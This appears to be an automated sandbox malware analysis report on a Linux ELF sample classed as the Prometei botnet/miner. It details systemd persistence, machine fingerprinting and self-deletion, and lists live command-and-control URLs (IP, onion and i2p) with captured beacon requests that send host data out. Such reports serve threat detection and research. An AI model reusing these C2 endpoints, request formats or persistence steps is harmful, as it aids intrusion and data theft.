Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1652748
MD5:6573a24653020e43e6b1334876e9e365
SHA1:c37494f055c96a1c382926296ebc0667e6c765d8
SHA256:8ae62082b05ff343af8c51805259620512262b298e244f10c36982489df633fd
Tags:elfuser-abuse_ch
Infos:

Detection

Prometei
Score:92
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Yara detected Prometei
Drops files in suspicious directories
Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)
Found Tor onion address
Sample deletes itself
Sample is packed with UPX
Creates hidden files and/or directories
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "pgrep" command search for and/or send signals to processes
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "uname" command used to read OS and architecture name
HTTP GET or POST without a user agent
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Sample tries to set the executable flag
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1652748
Start date and time:2025-03-31 13:33:12 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 20s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal92.troj.evad.linELF@0/13@0/0
  • VT rate limit hit for: na.elf

Runtime Messages

Command:/tmp/na.elf
PID:6203
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.

Process Tree

  • system is lnxubuntu20
  • na.elf (PID: 6203, Parent: 6120, MD5: 6573a24653020e43e6b1334876e9e365) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 6206, Parent: 6203)
    • sh (PID: 6206, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep na.elf"
      • sh New Fork (PID: 6207, Parent: 6206)
      • pgrep (PID: 6207, Parent: 6206, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep na.elf
    • na.elf New Fork (PID: 6211, Parent: 6203)
    • sh (PID: 6211, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof na.elf"
      • sh New Fork (PID: 6212, Parent: 6211)
      • pidof (PID: 6212, Parent: 6211, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof na.elf
    • na.elf New Fork (PID: 6215, Parent: 6203)
    • sh (PID: 6215, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 6216, Parent: 6215)
      • pgrep (PID: 6216, Parent: 6215, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • na.elf New Fork (PID: 6219, Parent: 6203)
    • sh (PID: 6219, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof uplugplay"
      • sh New Fork (PID: 6222, Parent: 6219)
      • pidof (PID: 6222, Parent: 6219, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof uplugplay
    • na.elf New Fork (PID: 6225, Parent: 6203)
    • sh (PID: 6225, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 6226, Parent: 6225)
      • pgrep (PID: 6226, Parent: 6225, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • na.elf New Fork (PID: 6232, Parent: 6203)
    • sh (PID: 6232, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 6235, Parent: 6232)
      • pidof (PID: 6235, Parent: 6232, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup
    • na.elf New Fork (PID: 6244, Parent: 6203)
    • sh (PID: 6244, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 6245, Parent: 6244)
      • systemctl (PID: 6245, Parent: 6244, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • na.elf New Fork (PID: 6262, Parent: 6203)
    • sh (PID: 6262, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 6263, Parent: 6262)
      • systemctl (PID: 6263, Parent: 6262, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • na.elf New Fork (PID: 6269, Parent: 6203)
    • sh (PID: 6269, Parent: 6203, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 6282, Parent: 6269)
      • systemctl (PID: 6282, Parent: 6269, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • fwupd New Fork (PID: 6234, Parent: 1)
  • gpg (PID: 6234, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version
  • fwupd New Fork (PID: 6237, Parent: 1)
  • gpg (PID: 6237, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
  • fwupd New Fork (PID: 6239, Parent: 1)
  • gpg (PID: 6239, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
  • fwupd New Fork (PID: 6243, Parent: 1)
  • gpg (PID: 6243, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
  • fwupd New Fork (PID: 6247, Parent: 1)
  • gpg (PID: 6247, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
  • systemd New Fork (PID: 6249, Parent: 6248)
  • snapd-env-generator (PID: 6249, Parent: 6248, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6267, Parent: 6266)
  • snapd-env-generator (PID: 6267, Parent: 6266, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6283, Parent: 1)
  • uplugplay (PID: 6283, Parent: 1, MD5: 6573a24653020e43e6b1334876e9e365) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 6284, Parent: 6283)
      • sh (PID: 6285, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 6286, Parent: 6285)
        • uplugplay (PID: 6286, Parent: 6285, MD5: 6573a24653020e43e6b1334876e9e365) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 6292, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6293, Parent: 6292)
            • hostnamectl (PID: 6293, Parent: 6292, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6297, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6298, Parent: 6297)
            • hostnamectl (PID: 6298, Parent: 6297, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6433, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6437, Parent: 6433)
            • dmidecode (PID: 6437, Parent: 6433, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6436, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6438, Parent: 6436)
            • uptime (PID: 6438, Parent: 6436, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6441, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6442, Parent: 6441)
            • uname (PID: 6442, Parent: 6441, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
          • sh (PID: 6445, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 6446, Parent: 6445)
            • dmidecode (PID: 6446, Parent: 6445, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 6453, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6454, Parent: 6453)
            • uptime (PID: 6454, Parent: 6453, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6457, Parent: 6286, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6458, Parent: 6457)
            • uname (PID: 6458, Parent: 6457, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • systemd New Fork (PID: 6299, Parent: 1)
  • systemd-hostnamed (PID: 6299, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
na.elfLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45

Dropped Files

SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplayLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45

Memory Dumps

SourceRuleDescriptionAuthorStrings
6203.1.0000000000401000.00000000004f9000.r-x.sdmpLinux_Hacktool_Flooder_1a4eb229unknownunknown
  • 0x9beb:$a: F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B
6203.1.0000000000401000.00000000004f9000.r-x.sdmpLinux_Hacktool_Flooder_f454ec10unknownunknown
  • 0xb569:$a: 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B
6203.1.000000000052d000.0000000001575000.rw-.sdmpLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x7190db:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Process Memory Space: na.elf PID: 6203JoeSecurity_PrometeiYara detected PrometeiJoe Security

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-31T13:34:09.010173+020028033053Unknown Traffic192.168.2.2358304152.36.128.1880TCP
    2025-03-31T13:34:16.235087+020028033053Unknown Traffic192.168.2.2358306152.36.128.1880TCP

    Joe Sandbox Signatures

    • AV Detection
    • Bitcoin Miner
    • Networking
    • System Summary
    • Data Obfuscation
    • Persistence and Installation Behavior
    • Hooking and other Techniques for Hiding and Protection
    • Malware Analysis System Evasion
    • Language, Device and Operating System Detection
    • Stealing of Sensitive Information

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: na.elfAvira: detected
    Source: /usr/sbin/uplugplayAvira: detection malicious, Label: LINUX/GM.Agent.JQ

    Bitcoin Miner

    barindex
    Source: Yara matchFile source: Process Memory Space: na.elf PID: 6203, type: MEMORYSTR
    Source: /usr/sbin/uplugplay (PID: 6286)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
    Source: /usr/bin/pgrep (PID: 6207)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6226)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6286)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/uptime (PID: 6438)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/uptime (PID: 6454)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

    Networking

    barindex
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
    Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?r=8&i=W40DBT2U1D37V673 HTTP/1.0Host: 152.36.128.18
    Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDA2OjM0OjE0IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAzLjQwLCAxLjM1LCAwLjUzfDE3NDM0MjA4NTQNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=W40DBT2U1D37V673&h=galassia&enckey=TmbdLiekzW9/hq5lwm3rcjU2VdABOdSopMttuU0H8ytJDWb2XrwvKxBq9miWReqZ7F5I6lX8mG2W4uJWg0eUNgzz2AON1JQuBzxmHUumNid6UyxTjxYN8mzz60B4UOKC7KQSrTdYYxJQos7bNwZez+xHpIHs53XTOkx1hCG1wJQ= HTTP/1.0Host: 152.36.128.18
    Source: /usr/sbin/uplugplay (PID: 6286)Socket: 0.0.0.0:89Jump to behavior
    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58304 -> 152.36.128.18:80
    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58306 -> 152.36.128.18:80
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.49
    Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?r=8&i=W40DBT2U1D37V673 HTTP/1.0Host: 152.36.128.18
    Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDA2OjM0OjE0IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAzLjQwLCAxLjM1LCAwLjUzfDE3NDM0MjA4NTQNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=W40DBT2U1D37V673&h=galassia&enckey=TmbdLiekzW9/hq5lwm3rcjU2VdABOdSopMttuU0H8ytJDWb2XrwvKxBq9miWReqZ7F5I6lX8mG2W4uJWg0eUNgzz2AON1JQuBzxmHUumNid6UyxTjxYN8mzz60B4UOKC7KQSrTdYYxJQos7bNwZez+xHpIHs53XTOkx1hCG1wJQ= HTTP/1.0Host: 152.36.128.18
    Source: na.elf, uplugplay.12.drString found in binary or memory: http://152.36.128
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
    Source: na.elf, uplugplay.12.drString found in binary or memory: http://upx.sf.net
    Source: na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44998
    Source: unknownNetwork traffic detected: HTTP traffic on port 44998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

    System Summary

    barindex
    Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
    Source: 6203.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
    Source: 6203.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
    Source: 6203.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
    Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
    Source: LOAD without section mappingsProgram segment: 0x400000
    Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
    Source: 6203.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
    Source: 6203.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
    Source: 6203.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
    Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
    Source: classification engineClassification label: mal92.troj.evad.linELF@0/13@0/0

    Data Obfuscation

    barindex
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $
    Source: /usr/bin/pidof (PID: 6212)Directory: //.Jump to behavior
    Source: /usr/bin/pidof (PID: 6222)Directory: //.Jump to behavior
    Source: /usr/bin/pidof (PID: 6235)Directory: //.Jump to behavior
    Source: /usr/bin/gpg (PID: 6237)File: /var/lib/fwupd/gnupg/.#lk0x000055c247a27b80.galassia.6237Jump to behavior
    Source: /usr/bin/gpg (PID: 6239)File: /var/lib/fwupd/gnupg/.#lk0x0000556998804b80.galassia.6239Jump to behavior
    Source: /usr/bin/gpg (PID: 6243)File: /var/lib/fwupd/gnupg/.#lk0x000055ce0f126b80.galassia.6243Jump to behavior
    Source: /usr/bin/gpg (PID: 6247)File: /var/lib/fwupd/gnupg/.#lk0x00005576795d1b80.galassia.6247Jump to behavior
    Source: /lib/systemd/systemd-hostnamed (PID: 6299)Directory: <invalid fd (10)>/..Jump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1582/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1582/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/3088/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/3088/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/230/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/230/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/110/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/110/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/231/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/231/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/111/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/111/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/232/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/232/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1579/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1579/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/112/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/112/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/233/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/233/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1699/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6216)File opened: /proc/1699/cmdlineJump to behavior
